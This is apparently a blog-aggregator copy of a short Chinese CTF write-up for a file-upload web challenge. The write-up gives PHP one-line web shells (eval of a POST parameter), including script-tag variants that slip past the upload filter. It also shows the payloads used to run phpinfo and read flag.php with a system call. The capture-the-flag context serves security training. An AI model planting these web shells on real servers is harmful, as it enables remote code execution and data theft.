当前位置:网站首页>“百度杯”CTF比赛 九月场,Web:Upload
“百度杯”CTF比赛 九月场,Web:Upload
2022-07-05 13:00:00 【Part 02】
题目内容:
想怎么传就怎么传,就是这么任性。
tips:flag在flag.php中
<?php @eval($_POST['Pai']);?>
<script language="pphphp">@eval($_POST['Pai']);</script>
<script language="PHP">@eval($_POST['Pai']);</script>
此时页面和源码都看不到代码了,直接 post
Pai=phpinfo();
正常命令执行获取 flag
system('tac ../flag.php');
边栏推荐
- 爱可生SQLe审核工具顺利完成信通院‘SQL质量管理平台分级能力’评测
- JXL notes
- js判断数组中是否存在某个元素(四种方法)
- Datapipeline was selected into the 2022 digital intelligence atlas and database development report of China Academy of communications and communications
- 自然语言处理系列(一)入门概述
- LB10S-ASEMI整流桥LB10S
- mysql拆分字符串做条件查询
- SAP UI5 DynamicPage 控件介紹
- Write macro with word
- #从源头解决# 自定义头文件在VS上出现“无法打开源文件“XX.h“的问题
猜你喜欢
ABAP editor in SAP segw transaction code
Write macro with word
C# 对象存储
峰会回顾|保旺达-合规和安全双驱动的数据安全整体防护体系
量价虽降,商业银行结构性存款为何受上市公司所偏爱?
Sorry, we can't open xxxxx Docx, because there is a problem with the content (repackaging problem)
关于 SAP UI5 getSAPLogonLanguage is not a function 的错误消息以及 API 版本的讨论
自然语言处理系列(一)入门概述
OpenHarmony应用开发之Navigation组件详解
DataPipeline双料入选中国信通院2022数智化图谱、数据库发展报告
随机推荐
Natural language processing series (I) introduction overview
SAP SEGW 事物码里的 ABAP Editor
How to protect user privacy without password authentication?
#yyds干货盘点# 解决名企真题:搬圆桌
【每日一题】1200. 最小绝对差
leetcode:221. Maximum square [essence of DP state transition]
Run, open circuit
RHCSA9
Le rapport de recherche sur l'analyse matricielle de la Force des fournisseurs de RPA dans le secteur bancaire chinois en 2022 a été officiellement lancé.
Introduction to sap ui5 dynamicpage control
使用 jMeter 对 SAP Spartacus 进行并发性能测试
量价虽降,商业银行结构性存款为何受上市公司所偏爱?
[cloud native] use of Nacos taskmanager task management
聊聊异步编程的 7 种实现方式
Rocky基础命令3
国际自动机工程师学会(SAE International)战略投资几何伙伴
A deep long article on the simplification and acceleration of join operation
SAP UI5 视图里的 OverflowToolbar 控件
155. Minimum stack
MySQL giant pit: update updates should be judged with caution by affecting the number of rows!!!